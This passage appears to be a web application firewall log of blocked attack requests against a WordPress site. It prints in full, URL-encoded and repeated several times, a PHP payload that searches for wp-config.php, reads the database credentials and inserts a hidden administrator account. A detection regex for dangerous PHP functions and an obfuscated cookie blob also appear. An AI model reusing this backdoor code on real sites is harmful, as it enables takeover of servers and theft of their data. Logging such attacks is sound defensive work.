0as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\ncookie:4=0a64bb21b33726046f335a7dc8ae049c; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvqyxvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWypKIyp3DvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nhost:dewenlabels.com\nuser-agent:Mozilla\/5.0 (Linux; Android 12; Pixel 6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.58 Mobile Safari\/537.36\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\nsec-ch-ua-mobile:?1\nsec-ch-ua-platform:\"Android\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\ncontent-length:12640\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\nvY=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:09:03","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> bRjtVo:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));","POST \/wp-includes\/sodium_compat\/src\/Core\/Base64\/security.php HTTP\/1.1\nsec-fetch-site:none\ncontent-length:12663\nhost:dewenlabels.com\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/107.0.0.0 Safari\/537.36\nsec-fetch-user:?1\naccept:*\/*\nsec-fetch-dest:document\nupgrade-insecure-requests:1\nsec-ch-ua:\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"\naccept-encoding:gzip,deflate\nsec-ch-ua-mobile:?0\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-platform:\"Windows\"\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-mode:navigate\n\nbRjtVo=eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%